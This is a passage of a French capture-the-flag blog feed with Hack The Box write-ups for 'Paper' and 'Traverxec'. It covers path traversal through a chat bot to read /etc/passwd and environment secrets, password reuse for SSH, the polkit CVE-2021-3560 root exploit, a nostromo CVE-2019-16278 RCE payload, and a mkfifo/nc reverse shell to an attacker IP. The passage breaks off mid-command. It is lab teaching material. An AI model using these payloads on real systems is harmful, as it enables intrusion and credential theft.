profil avec un bot, on peut discuter avec lui. Avec la commande help on voit une commande qui permet d&rsquo;afficher des fichiers. Cette commande fait appelle à <code>cat</code> pour afficher n&rsquo;importe quel fichier. On peut utiliser cette commande comme une LFI pour afficher le contenu de n&rsquo;importe quel fichier :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">recyclops file test.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">cat: /home/dwight/sales/test.txt: No such file or directory </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">recyclops file ../../../etc/passwd </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> &lt;!<span class="o">=====</span>Contents of file ../../../etc/passwd<span class="o">=====</span>&gt; </span></span><span class="line"><span class="cl">root❌0:0:root:/root:/bin/bash </span></span><span class="line"><span class="cl">bin❌1:1:bin:/bin:/sbin/nologin </span></span><span class="line"><span class="cl">daemon❌2:2:daemon:/sbin:/sbin/nologin </span></span><span class="line"><span class="cl">adm❌3:4:adm:/var/adm:/sbin/nologin </span></span><span class="line"><span class="cl">lp❌4:7:lp:/var/spool/lpd:/sbin/nologin </span></span><span class="line"><span class="cl">sync❌5:0:sync:/sbin:/bin/sync </span></span><span class="line"><span class="cl">shutdown❌6:0:shutdown:/sbin:/sbin/shutdown </span></span><span class="line"><span class="cl">halt❌7:0:halt:/sbin:/sbin/halt </span></span><span class="line"><span class="cl">mail❌8:12:mail:/var/spool/mail:/sbin/nologin </span></span><span class="line"><span class="cl">operator❌11:0:operator:/root:/sbin/nologin </span></span><span class="line"><span class="cl">games❌12💯games:/usr/games:/sbin/nologin </span></span><span class="line"><span class="cl">ftp❌14:50:FTP User:/var/ftp:/sbin/nologin </span></span><span class="line"><span class="cl">nobody❌65534:65534:Kernel Overflow User:/:/sbin/nologin </span></span><span class="line"><span class="cl">dbus❌81:81:System message bus:/:/sbin/nologin </span></span><span class="line"><span class="cl">systemd-coredump❌999:997:systemd Core Dumper:/:/sbin/nologin </span></span><span class="line"><span class="cl">systemd-resolve❌193:193:systemd Resolver:/:/sbin/nologin </span></span><span class="line"><span class="cl">tss❌59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin </span></span><span class="line"><span class="cl">polkitd❌998:996:User <span class="k">for</span> polkitd:/:/sbin/nologin </span></span><span class="line"><span class="cl">geoclue❌997:994:User <span class="k">for</span> geoclue:/var/lib/geoclue:/sbin/nologin </span></span><span class="line"><span class="cl">rtkit❌172:172:RealtimeKit:/proc:/sbin/nologin </span></span><span class="line"><span class="cl">qemu❌107:107:qemu user:/:/sbin/nologin </span></span><span class="line"><span class="cl">apache❌48:48:Apache:/usr/share/httpd:/sbin/nologin </span></span><span class="line"><span class="cl">cockpit-ws❌996:993:User <span class="k">for</span> cockpit-ws:/:/sbin/nologin </span></span><span class="line"><span class="cl">pulse❌171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin </span></span><span class="line"><span class="cl">usbmuxd❌113:113:usbmuxd user:/:/sbin/nologin </span></span><span class="line"><span class="cl">unbound❌995:990:Unbound DNS resolver:/etc/unbound:/sbin/nologin </span></span><span class="line"><span class="cl">rpc❌32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin </span></span><span class="line"><span class="cl">gluster❌994:989:GlusterFS daemons:/run/gluster:/sbin/nologin </span></span><span class="line"><span class="cl">chrony❌993:987::/var/lib/chrony:/sbin/nologin </span></span><span class="line"><span class="cl">libstoragemgmt❌992:986:daemon account <span class="k">for</span> libstoragemgmt:/var/run/lsm:/sbin/nologin </span></span><span class="line"><span class="cl">saslauth❌991:76:Saslauthd user:/run/saslauthd:/sbin/nologin </span></span><span class="line"><span class="cl">dnsmasq❌985:985:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin </span></span><span class="line"><span class="cl">radvd❌75:75:radvd user:/:/sbin/nologin </span></span><span class="line"><span class="cl">clevis❌984:983:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin </span></span><span class="line"><span class="cl">pegasus❌66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin </span></span><span class="line"><span class="cl">sssd❌983:981:User <span class="k">for</span> sssd:/:/sbin/nologin </span></span><span class="line"><span class="cl">colord❌982:980:User <span class="k">for</span> colord:/var/lib/colord:/sbin/nologin </span></span><span class="line"><span class="cl">rpcuser❌29:29:RPC Service User:/var/lib/nfs:/sbin/nologin </span></span><span class="line"><span class="cl">setroubleshoot❌981:979::/var/lib/setroubleshoot:/sbin/nologin </span></span><span class="line"><span class="cl">pipewire❌980:978:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin </span></span><span class="line"><span class="cl">gdm❌42:42::/var/lib/gdm:/sbin/nologin </span></span><span class="line"><span class="cl">gnome-initial-setup❌979:977::/run/gnome-initial-setup/:/sbin/nologin </span></span><span class="line"><span class="cl">insights❌978:976:Red Hat Insights:/var/lib/insights:/sbin/nologin </span></span><span class="line"><span class="cl">sshd❌74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin </span></span><span class="line"><span class="cl">avahi❌70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin </span></span><span class="line"><span class="cl">tcpdump❌72:72::/:/sbin/nologin </span></span><span class="line"><span class="cl">mysql❌27:27:MySQL Server:/var/lib/mysql:/sbin/nologin </span></span><span class="line"><span class="cl">nginx❌977:975:Nginx web server:/var/lib/nginx:/sbin/nologin </span></span><span class="line"><span class="cl">mongod❌976:974:mongod:/var/lib/mongo:/bin/false </span></span><span class="line"><span class="cl">rocketchat❌1001:1001::/home/rocketchat:/bin/bash </span></span><span class="line"><span class="cl">dwight❌1004:1004::/home/dwight:/bin/bash </span></span><span class="line"><span class="cl">&lt;!<span class="o">=====</span>End of file ../../../etc/passwd<span class="o">=====</span>&gt; </span></span></code></pre></td></tr></table> </div> </div><h3 id="procselfenviron-environment-variables">/proc/self/environ: Environment variables </h3><p>On peut afficher les variables d&rsquo;environnements (et d&rsquo;autres infos) grâce aux fichiers présents dans /proc/self :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">recyclops file ../../../proc/self/cmdline </span></span><span class="line"><span class="cl"><span class="c1">#################################################</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Bot </span></span><span class="line"><span class="cl">7:05 PM </span></span><span class="line"><span class="cl">&lt;!<span class="o">=====</span>Contents of file ../../../proc/self/cmdline<span class="o">=====</span>&gt; </span></span><span class="line"><span class="cl">cat/home/dwight/sales/../../../proc/self/cmdline </span></span><span class="line"><span class="cl">&lt;!<span class="o">=====</span>End of file ../../../proc/self/cmdline<span class="o">=====</span>&gt; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">recyclops file ../../../proc/self/environ </span></span><span class="line"><span class="cl"><span class="c1">#################################################</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Bot </span></span><span class="line"><span class="cl">7:07 PM </span></span><span class="line"><span class="cl">&lt;!<span class="o">=====</span>Contents of file ../../../proc/self/environ<span class="o">=====</span>&gt; </span></span><span class="line"><span class="cl"><span class="nv">RESPOND_TO_EDITED</span><span class="o">=</span><span class="nv">trueROCKETCHAT_USER</span><span class="o">=</span><span class="nv">recyclopsLANG</span><span class="o">=</span>en_US.UTF-8OLDPWD<span class="o">=</span>/home/dwight/hubotROCKETCHAT_URL<span class="o">=</span>http://127.0.0.1:48320ROCKETCHAT_USESSL<span class="o">=</span><span class="nv">falseXDG_SESSION_ID</span><span class="o">=</span><span class="nv">1USER</span><span class="o">=</span><span class="nv">dwightRESPOND_TO_DM</span><span class="o">=</span><span class="nv">truePWD</span><span class="o">=</span>/home/dwight/hubotHOME<span class="o">=</span>/home/dwightPORT<span class="o">=</span><span class="nv">8000ROCKETCHAT_PASSWORD</span><span class="o">=</span>Queenofblad3s!23SHELL<span class="o">=</span>/bin/shSHLVL<span class="o">=</span><span class="nv">4BIND_ADDRESS</span><span class="o">=</span>127.0.0.1LOGNAME<span class="o">=</span><span class="nv">dwightDBUS_SESSION_BUS_ADDRESS</span><span class="o">=</span>unix:path<span class="o">=</span>/run/user/1004/busXDG_RUNTIME_DIR<span class="o">=</span>/run/user/1004PATH<span class="o">=</span>/home/dwight/hubot/node_modules/coffeescript/bin:node_modules/.bin:node_modules/hubot/node_modules/.bin:/usr/bin:/bin_<span class="o">=</span>/usr/bin/cat </span></span><span class="line"><span class="cl">&lt;!<span class="o">=====</span>End of file ../../../proc/self/environ<span class="o">=====</span>&gt; </span></span></code></pre></td></tr></table> </div> </div><p>On obtient les creds de rocketchat sur la plateforme rocket.chat rocketchat : <code>Queenofblad3s!23</code></p> <p>Après vérification, on ne peut pas se connecter en ssh avec cet utilisateur et ce mot de passe. Les creds marchent sur la plateforme web mais un message nous indique qu&rsquo;il est interdit de se connecter à l&rsquo;interface web avec un bot.</p> <h3 id="ssh--dwight">SSH : dwight </h3><p>Le mot de passe de rocketchat fonctionne pour l&rsquo;utilisateur dwight en ssh: dwight : <code>Queenofblad3s!23</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ssh dwight@office.paper </span></span><span class="line"><span class="cl">dwight@office.paper<span class="err">&#39;</span>s password: </span></span><span class="line"><span class="cl">Activate the web console with: systemctl <span class="nb">enable</span> --now cockpit.socket </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Last failed login: Thu Jan <span class="m">30</span> 18:24:37 EST <span class="m">2025</span> from 10.10.14.42 on ssh:notty </span></span><span class="line"><span class="cl">There were <span class="m">3</span> failed login attempts since the last successful login. </span></span><span class="line"><span class="cl">Last login: Tue Feb <span class="m">1</span> 09:14:33 <span class="m">2022</span> from 10.10.14.23 </span></span><span class="line"><span class="cl"><span class="o">[</span>dwight@paper ~<span class="o">]</span>$ cat user.txt </span></span><span class="line"><span class="cl">4419.....697b </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="cve-2021-3560--polkit">CVE-2021-3560 : polkit </h3><p>Avec linpeas, on trouve une elevation de privilege grâce à une faille dans l&rsquo;outil polkit, <code>CVE-2021-3560</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">./linpeas.sh </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">Vulnerable to CVE-2021-3560 </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>On trouve un poc sur github avec un script .sh : <a class="link" href="https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation" target="_blank" rel="noopener" >https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation</a></p> <p>Au début il ne fonctionne pas, le mot de passe du nouveau user crée doit etre équivalent a l&rsquo;actuel mais ça n&rsquo;était pas le cas. En précisant le parametre -p=a, l&rsquo;exploit fonctionne, pas de problème. (Je précise car j&rsquo;ai abandonné cette CVE à cause de ça&hellip; Je pensais que ce n&rsquo;était pas la solution de la boxe.)</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="o">[</span>dwight@paper ~<span class="o">]</span>$ ./exploit.sh -p<span class="o">=</span>a </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Username <span class="nb">set</span> as : secnigma </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> No Custom Timing specified. </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Timing will be detected Automatically </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Force flag not set. </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Vulnerability checking is ENABLED! </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Starting Vulnerability Checks... </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Checking distribution... </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Detected Linux distribution as <span class="s2">&#34;centos&#34;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Checking <span class="k">if</span> Accountsservice and Gnome-Control-Center is installed </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Accounts service and Gnome-Control-Center Installation Found!! </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Checking <span class="k">if</span> polkit version is vulnerable </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Polkit version appears to be vulnerable!! </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Starting exploit... </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Inserting Username secnigma... </span></span><span class="line"><span class="cl">Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Inserted Username secnigma with UID 1005! </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Inserting password hash... </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> It looks like the password insertion was succesful! </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Try to login as the injected user using su - secnigma </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> When prompted <span class="k">for</span> password, enter your password </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> If the username is inserted, but the login fails<span class="p">;</span> try running the exploit again. </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> If the login was succesful,simply enter <span class="s1">&#39;sudo bash&#39;</span> and drop into a root shell! </span></span><span class="line"><span class="cl"><span class="o">[</span>dwight@paper ~<span class="o">]</span>$ su - secnigma </span></span><span class="line"><span class="cl">Password: </span></span><span class="line"><span class="cl"><span class="o">[</span>secnigma@paper ~<span class="o">]</span>$ whoami </span></span><span class="line"><span class="cl">secnigma </span></span><span class="line"><span class="cl"><span class="o">[</span>secnigma@paper ~<span class="o">]</span>$ sudo bash </span></span><span class="line"><span class="cl"><span class="o">[</span>sudo<span class="o">]</span> password <span class="k">for</span> secnigma: </span></span><span class="line"><span class="cl"><span class="o">[</span>root@paper secnigma<span class="o">]</span><span class="c1"># cat /root/root.txt </span> </span></span><span class="line"><span class="cl">ccbf.....2804 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/traverxec-htb/Thu, 23 Jan 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/traverxec-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Traverxec cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Traverxec</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.165</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><p>david : <code>Nowonly4me</code></p> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sC -sV -An -T4 -vvv 10.10.10.165 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u1 <span class="o">(</span>protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVWo6eEhBKO19Owd6sVIAFVCJjQqSL4g16oI/DoFwUo+ubJyyIeTRagQNE91YdCrENXF2qBs2yFj2fqfRZy9iqGB09VOZt6i8oalpbmFwkBDtCdHoIAZbaZFKAl+m1UBell2v0xUhAy37Wl9BjoUU3EQBVF5QJNQqvb/mSqHsi5TAJcMtCpWKA4So3pwZcTatSu5x/RYdKzzo9fWSS6hjO4/hdJ4BM6eyKQxa29vl/ea1PvcHPY5EDTRX5RtraV9HAT7w2zIZH5W6i3BQvMGEckrrvVTZ6Ge3Gjx00ORLBdoVyqQeXQzIJ/vuDuJOH2G6E/AHDsw3n5yFNMKeCvNNL </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLpsS/IDFr0gxOgk9GkAT0G4vhnRdtvoL8iem2q8yoRCatUIib1nkp5ViHvLEgL6e3AnzUJGFLI3TFz+CInilq4<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGJ16OMR0bxc/4SAEl1yiyEUxC3i/dFH7ftnCU7+P+3s </span></span><span class="line"><span class="cl">80/tcp open http syn-ack nostromo 1.9.6 </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: nostromo 1.9.6 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: TRAVERXEC </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="cve2019-16278---rce">cve2019-16278 - RCE </h3><p>Detail: Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request. On peut se balader dans le PATH avec des &ldquo;../&rdquo; jusqu&rsquo;a atteindre le binaire &ldquo;/bin/sh&rdquo; et executer n&rsquo;importe quelle commande.</p> <p>L&rsquo;exploit est défini comme suit:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">def cve<span class="o">(</span>target, port, cmd<span class="o">)</span>: </span></span><span class="line"><span class="cl"> <span class="nv">soc</span> <span class="o">=</span> socket.socket<span class="o">()</span> </span></span><span class="line"><span class="cl"> soc.connect<span class="o">((</span>target, int<span class="o">(</span>port<span class="o">)))</span> </span></span><span class="line"><span class="cl"> <span class="nv">payload</span> <span class="o">=</span> <span class="s1">&#39;POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2&gt;&amp;1&#39;</span>.format<span class="o">(</span>cmd<span class="o">)</span> </span></span><span class="line"><span class="cl"> soc.send<span class="o">(</span>payload<span class="o">)</span> </span></span><span class="line"><span class="cl"> <span class="nv">receive</span> <span class="o">=</span> connect<span class="o">(</span>soc<span class="o">)</span> </span></span><span class="line"><span class="cl"> print<span class="o">(</span>receive<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Traverxec<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ python2 47837.py 10.10.10.165 <span class="m">80</span> <span class="s2">&#34;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2&gt;&amp;1|nc 10.10.16.6 1337 &gt;/tmp/f&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> _____-2019-16278 </span></span><span class="line"><span class="cl"> _____ _______ ______ _____<span class="se">\ </span> _____<span class="se">\ </span> <span class="se">\_\ </span> <span class="p">|</span> <span class="p">|</span> <span class="p">|</span> / / <span class="p">|</span> <span class="p">|</span> </span></span><span class="line"><span class="cl"> / /<span class="p">|</span> <span class="o">||</span> / / /<span class="p">|</span>/ / /___/<span class="p">|</span> </span></span><span class="line"><span class="cl"> / / /____/<span class="o">||</span><span class="se">\ </span> <span class="se">\ </span> <span class="se">\ </span> <span class="p">|</span>/<span class="p">|</span> <span class="p">|</span>__ <span class="p">|</span>___<span class="p">|</span>/ </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="p">|</span> <span class="p">|</span>____<span class="p">|</span>/ <span class="se">\ \ </span> <span class="se">\ </span><span class="p">|</span> <span class="p">|</span> <span class="p">|</span> <span class="p">|</span> <span class="p">|</span> _____ <span class="se">\|</span> <span class="se">\|</span> <span class="p">|</span> <span class="p">|</span> __/ __ </span></span><span class="line"><span class="cl"><span class="p">|</span><span class="se">\ </span> <span class="se">\|\ </span> <span class="se">\ </span> <span class="p">|</span><span class="se">\ </span> /<span class="p">|</span> <span class="p">|</span><span class="se">\ </span> <span class="se">\ </span> / <span class="p">|</span> <span class="se">\_</span>____<span class="se">\|</span> <span class="p">|</span> <span class="p">|</span> <span class="se">\_</span>______/ <span class="p">|</span> <span class="p">|</span> <span class="se">\_</span>___<span class="se">\/</span> <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="p">|</span> /____/<span class="p">|</span> <span class="se">\ </span><span class="p">|</span> <span class="p">|</span> / <span class="p">|</span> <span class="p">|</span> <span class="p">|</span>____/<span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="se">\|</span>_____<span class="p">|</span> <span class="o">||</span> <span class="se">\|</span>_____<span class="p">|</span>/ <span class="se">\|</span>____<span class="p">|</span> <span class="p">|</span> <span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span>____<span class="p">|</span>/ <span class="p">|</span>___<span class="p">|</span>/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1337</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.16.6<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.165<span class="o">]</span> <span class="m">57934</span> </span></span><span class="line"><span class="cl">bash: cannot <span class="nb">set</span> terminal process group <span class="o">(</span>444<span class="o">)</span>: Inappropriate ioctl <span class="k">for</span> device </span></span><span class="line"><span class="cl">bash: no job control in this shell </span></span><span class="line"><span class="cl">www-data@traverxec:/usr/bin$ python3 -c <span class="s1">&#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;</span> </span></span><span class="line"><span class="cl">python3 -c <span 